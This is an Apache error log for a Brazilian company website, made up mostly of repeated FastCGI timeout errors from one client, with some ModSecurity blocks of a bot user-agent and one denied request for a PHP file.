[Sun Mar 15 21:03:27.730820 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60148] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:03:49.163596 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:60430] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:04:11.125782 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:60738] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:04:32.129831 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60952] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:04:54.125854 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33024] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:05:16.069830 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:33428] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:05:37.129819 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:33776] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:05:58.129791 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:34046] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:06:19.153847 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:34328] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:06:40.125849 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34626] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:06:44.375840 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.228.16:36384] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdJlNSswJuvopo3lOgiaAAAAIU"]
[Sun Mar 15 21:07:01.127622 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34870] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:07:22.036358 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35106] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:07:44.106534 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35354] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:08:05.152142 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35572] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:08:26.125817 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35768] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:08:48.129446 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:36018] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:09:10.129821 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:36252] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:09:32.138183 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:36518] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:09:53.158162 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36772] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:10:17.125915 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:37030] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:10:33.617577 2026] [:error] [pid 21946:tid 140411599251200] [client 74.7.244.31:58852] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdKeXbQATo66fKoS7wG2wAAANE"]
[Sun Mar 15 21:10:38.121685 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:37194] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:10:59.130232 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:37388] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:11:20.069914 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:37630] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:11:41.045808 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37808] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:11:52.540682 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.228.16:34830] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdKyLABkC4fWIHEf8GoIwAAAE8"]
[Sun Mar 15 21:12:02.136942 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:38058] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:12:23.124976 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38248] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:12:44.137815 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38418] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:13:05.124908 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:38646] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:13:26.117852 2026] [proxy_fcgi:error] [pid 32654:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38838] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:13:48.125833 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:39166] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:14:09.054903 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39416] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:14:32.079367 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39656] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:14:53.111018 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:39872] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:15:14.105900 2026] [proxy_fcgi:error] [pid 32654:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:40136] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:15:36.125905 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40398] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:15:44.140611 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.244.31:42694] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdLsLABkC4fWIHEf8GoawAAAFE"]
[Sun Mar 15 21:15:59.122257 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:40622] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:16:21.125794 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40898] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:16:42.133773 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:41138] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:17:03.121858 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41360] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:17:17.117846 2026] [:error] [pid 32654:tid 140411658000128] [client 74.7.228.16:47344] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdMDQlT9VtDQc7bgUxTowAAAQo"]
[Sun Mar 15 21:17:24.133028 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:41542] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:17:45.137811 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:41782] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:18:06.126878 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41916] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:18:27.134324 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42092] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:18:49.081793 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:42236] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:19:10.122321 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:42360] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:19:31.129788 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42466] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:19:52.034005 2026] [proxy_fcgi:error] [pid 21946:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:42596] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:20:14.125772 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42768] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:20:36.129807 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42944] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:20:59.137820 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43134] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:21:06.169021 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.244.31:60236] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdM8rABkC4fWIHEf8GotwAAAFE"]
[Sun Mar 15 21:21:21.125780 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:43322] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:21:42.079374 2026] [proxy_fcgi:error] [pid 32654:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:43472] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:22:03.121952 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43608] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:22:25.125787 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:43750] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:22:31.210695 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.228.16:48690] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdNR3bQATo66fKoS7wHpAAAAMA"]
[Sun Mar 15 21:22:46.131855 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:43978] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:23:08.125785 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44126] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:23:29.120088 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:44322] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:23:50.126565 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:44436] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:24:11.119910 2026] [proxy_fcgi:error] [pid 32654:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:44624] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:24:32.901577 2026] [proxy_fcgi:error] [pid 32654:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:44840] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:24:54.125788 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45056] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:25:15.135071 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:45178] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:25:36.130551 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45294] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:25:57.049818 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45442] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:26:21.116159 2026] [proxy_fcgi:error] [pid 32654:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:45678] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:26:42.140243 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:45812] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:27:03.133816 2026] [proxy_fcgi:error] [pid 32654:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45936] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:27:25.121828 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:46094] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:27:27.063878 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.244.31:44668] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdOb9SswJuvopo3lOgjyQAAAIU"]
[Sun Mar 15 21:27:46.130828 2026] [proxy_fcgi:error] [pid 21946:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:46228] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:28:00.782872 2026] [:error] [pid 21946:tid 140411574073088] [client 74.7.228.16:44884] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdOkHbQATo66fKoS7wICgAAANQ"]
[Sun Mar 15 21:28:07.105990 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:46432] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:28:28.090101 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:46582] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:28:50.118368 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:46774] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:29:11.117855 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:46980] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:29:32.103472 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47112] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:29:58.140544 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:47364] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:30:19.154139 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:47556] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:30:41.133818 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:47740] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:31:02.121840 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:47898] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:31:24.145783 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48092] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:31:45.121843 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:48306] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:32:06.125002 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:48560] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:32:27.133867 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:48790] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:32:39.875003 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.244.31:40484] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdPp7ABkC4fWIHEf8GplAAAAFU"]
[Sun Mar 15 21:32:48.127486 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:48942] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:33:09.395013 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.228.16:35278] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdPxbABkC4fWIHEf8GpoAAAAFU"]
[Sun Mar 15 21:33:10.030566 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:49138] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:33:31.126506 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:49286] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:33:53.122984 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:49424] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:34:14.141827 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:49578] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:34:36.120879 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:49884] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:34:57.125785 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50106] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:35:20.117786 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50270] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:35:41.126956 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50380] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:36:03.090514 2026] [proxy_fcgi:error] [pid 32654:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50498] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:36:26.126916 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50646] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:36:27.918867 2026] [access_compat:error] [pid 21806:tid 140411666392832] [client 103.177.124.25:52886] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/txets.php
[Sun Mar 15 21:36:47.129938 2026] [proxy_fcgi:error] [pid 32654:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:50844] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:37:09.037822 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:51094] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:37:30.128878 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:51274] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:37:51.119610 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:51394] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:37:53.034564 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.244.31:37266] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdQ4XjZBu2q05ozVU8S0AAAAVM"]
[Sun Mar 15 21:38:12.125909 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51552] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:38:34.133828 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:51758] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:38:56.119694 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:51872] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:39:17.125774 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:51956] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:39:39.057860 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:52148] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:40:00.121983 2026] [proxy_fcgi:error] [pid 32654:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52380] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:40:21.459580 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:52560] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:40:43.126364 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52676] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:41:04.129870 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52786] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:41:26.138437 2026] [proxy_fcgi:error] [pid 32654:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:52920] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:41:48.145808 2026] [proxy_fcgi:error] [pid 32654:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:53114] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:42:09.129853 2026] [proxy_fcgi:error] [pid 32654:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53270] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:42:30.029793 2026] [proxy_fcgi:error] [pid 32654:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:53408] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:42:51.041819 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:53532] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:43:12.121847 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53742] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:43:33.128611 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53902] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:43:55.133881 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54014] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:44:17.045846 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54110] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:44:39.025829 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:54332] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:45:00.129785 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54492] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:45:21.123800 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:54590] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:45:42.125797 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:54684] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:46:04.133811 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:54836] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:46:25.125861 2026] [proxy_fcgi:error] [pid 32654:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:54946] AH01075: Error dispatching request to : (polling)
